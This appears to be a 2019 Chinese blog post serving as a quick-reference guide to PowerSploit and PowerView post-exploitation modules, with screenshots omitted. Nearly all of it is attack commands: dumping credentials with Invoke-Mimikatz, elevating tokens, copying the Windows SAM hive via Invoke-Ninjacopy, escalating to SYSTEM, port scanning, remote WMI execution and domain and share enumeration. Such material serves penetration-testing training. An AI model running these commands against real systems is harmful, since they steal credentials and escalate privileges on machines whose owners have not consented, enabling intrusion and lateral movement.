PowerSploit的使用

Invoke-Mimikatz(依赖管理员)

Import-Module .\invoke-mimikatz.ps1
Invoke-Mimikatz –DumpCreds

在这里插入图片描述
使用Invoke-Mimikatz –command “mimikatz命令”来执行命令:

Invoke-Mimikatz –command "token::elevate"

在这里插入图片描述

Invoke-Ninjacopy (依赖管理员)

直接拷贝系统文件:
在这里插入图片描述

Import-Module .\invoke-ninjacopy.ps1
invoke-ninjacopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\Users\administrator\Desktop\SAM

在这里插入图片描述

Get-System (依赖管理员)

Import-Module .\Get-System 
get-system

在这里插入图片描述

Invoke-Portscan

扫描Top50端口:

Invoke-Portscan –Hosts ip地址 –TopPorts 50

在这里插入图片描述
扫描特定端口:

Invoke-Portscan –Hosts ip地址 –Ports 端口

在这里插入图片描述

Invoke-ReverseDnsLookup

反向解析IP地址:

Import-Module .\Invoke-ReverseDnsLookup.ps1
Invoke-ReverseDnsLookup 192.168.91.131

在这里插入图片描述

Invoke-Wmicommand

Import-Module .\Invoke-Wmicommand.ps1
Invoke-Wmicommand -Payload {whoami}

在这里插入图片描述

Get-NetDomain

Import-Module .\PowerView.ps1
Get-NetDomain

在这里插入图片描述

Get-NetDomainController

get-NetDomainController

在这里插入图片描述

Invoke-ProcessHunter –ProcessName 进程名
Invoke-ProcessHunter –ProcessName powershell

在这里插入图片描述

Get-NetShare获取共享信息

get-netshare

在这里插入图片描述

posted @ 2019-03-26 18:08  浅笑996  阅读(143)  评论(0编辑  收藏  举报